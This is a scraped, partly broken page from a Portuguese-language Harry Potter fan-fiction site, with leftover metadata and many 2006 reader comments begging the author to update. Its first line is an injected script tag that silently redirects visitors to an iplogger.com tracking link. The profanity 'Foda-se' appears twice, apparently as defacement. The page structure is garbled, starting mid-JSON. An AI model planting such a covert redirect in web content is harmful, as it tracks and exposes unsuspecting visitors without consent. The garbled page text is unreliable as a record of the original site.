<SCRIPT>window.location.href="https://iplogger.com/1Opv3.gif"</SCRIPT »>
Foda-se
","headline":"","url":"https://www.floreioseborroes.net/fics/ver/5005","inLanguage":"pt-BR","genre":"Fan fiction","isAccessibleForFree":true,"description":"Essa fic contém spoilers, dicas, pistas, insinuações, palpites e mais sobre Harry Potter and the Half-Blood Prince. Os personagens e o enred","image":"http://storage.msn.com/x1pFUxp6NG29bW3Uy8xnoGhE3lfnFozsOj27OUjuAgYgzcUOsZ6EQx96JvNJhv6aleexlwABNPPtGP-h9pKtxxztqk09YsUIa25GQDUTXGp657FjIUVEwKu0Xleo521HD0yUElEHid32hDdS-q22xqjPg","datePublished":"2005-08-05","dateModified":"2017-04-25","author":{"@type":"Person","name":"Sônia Sag","url":"https://www.floreioseborroes.net/users/ver/3634"},"publisher":{"@type":"Organization","name":"Floreios e Borroes","url":"https://www.floreioseborroes.net"},"aggregateRating":{"@type":"AggregateRating","ratingValue":4.92,"ratingCount":21437,"bestRating":5,"worstRating":1}}
Foda-se
Comentários (2867)
Olá Cara amiga.... Depois de um longo longo tempo, aqui estou de volta.....Seus ultimos capítulos estavam....como direi....sensacionais marvilhosos....ahh sei lá, já não tenho mais adjetivos para você , o ultimo capítulo então foi extraordinário, bela maneira como o Harry conseguiu adquirir mais poderes do Voldie, mas com um custo bem alto....estou mortalmente curioso pela continuação....por favor acabe com meu suplicio...um grande abraço...Querida Amiga.....
2006-07-07ATUALIZA!!! ATUALIZA!!! ATUALIZA!!! ATUALIZA!!! ATUALIZA!!! ATUALIZA!!! ATUALIZA!!! ATUALIZA!!! ATUALIZA!!! ATUALIZA!!! ATUALIZA!!! ATUALIZA!!! ATUALIZA!!! ATUALIZA!!! ATUALIZA!!! ATUALIZA!!! ATUALIZA!!! ATUALIZA!!! ATUALIZA!!! ATUALIZA!!! ATUALIZA!!! ATUALIZA!!! ATUALIZA!!! ATUALIZA!!! ATUALIZA!!! ATUALIZA!!! ATUALIZA!!! ATUALIZA!!! ATUALIZA!!! ATUALIZA!!! ATUALIZA!!! ATUALIZA!!! ATUALIZA!!! ATUALIZA!!! ATUALIZA!!! ATUALIZA!!! ATUALIZA!!! ATUALIZA!!! ATUALIZA!!! ATUALIZA!!! !!
2006-07-07desse jeito acho que vou ter que esperar para ler o ultimo capitulo dessa fic com o livro da jk!
2006-07-07Oi, nossa adorei sua fic! Só que to esperando o final...Será que ele vem??? Ah por favor, diz que sim! Pq vc seria muito mais malvada que o Lord se não colocasse o final. To esperando!!!! Parabéns
2006-07-07i genti calma q ela so vai posta terça ou quarta
2006-07-07meu deuuusssss!!!!!!!!! olhe que para eu consequir me interessar por um fic longo é bem complicado! mas esse ta genial, vc precisa ver meu despero quando a net daqui n queria entrar e eu n consequia mais ler, eu mexi o mundo, para colocar a net de volta, espalhei a historia para meus amigos que acabaram lendo comigo ate de madru!! e agora meu dessespero por ver que o fic n ta terminado! adorei viu! muito bom, vc consequia me deixar bem confusa em fazer me lembra que o livro so tem no proximo ano!! fico triste em saber que ñ vai ter nenhum Bull no 7 livro, adorei ele ideias muito boas vc tem!
2006-07-07Sonia Sua fic eh divina, estou lendo a tres dias e agora nao vejo a hora de vc colocar a sua finalizacao. Vc deveria ser escritora viu moca, imaginacao e boa redacao nao lhe faltam.
2006-07-06PELO AMOR DE JESUS CRISTOOOOOOOOOOOOOOOOOO POSTA ESSE FINAL SE NÃO EU TENHO UM TROÇOOOOOO OLHO TODO DIA, TODA HORA E NADAAAAAAAAAAAAAAAAAAA TO FICANDO MALUCO JA.... PELO AMOR DE GOODDDDD
2006-07-06pelo amor de deus atualiza logo faiz mais de um mes q vc tah pra atualiza ... vc ta me matandu de angustia .............. ta certo q o suspense sempre é bom ... mais isso ja ta virandu crueldade
2006-07-06ATUALIZA!!!ATUALIZA!!!ATUALIZA!!!ATUALIZA!!!ATUALIZA!!!ATUALIZA!!!ATUALIZA!!!ATUALIZA!!!ATUALIZA!!!ATUALIZA!!!ATUALIZA!!!ATUALIZA!!!ATUALIZA!!!ATUALIZA!!!ATUALIZA!!!ATUALIZA!!!ATUALIZA!!!ATUALIZA!!!ATUALIZA!!!ATUALIZA!!!ATUALIZA!!!ATUALIZA!!!ATUALIZA!!!ATUALIZA!!!ATUALIZA!!!ATUALIZA!!!ATUALIZA!!!ATUALIZA!!!ATUALIZA!!!ATUALIZA!!!ATUALIZA!!!ATUALIZA!!!ATUALIZA!!!ATUALIZA!!!ATUALIZA!!!ATUALIZA!!!ATUALIZA!!!ATUALIZA!!!ATUALIZA!!!ATUALIZA!!!ATUALIZA!!!ATUALIZA!!!
2006-07-06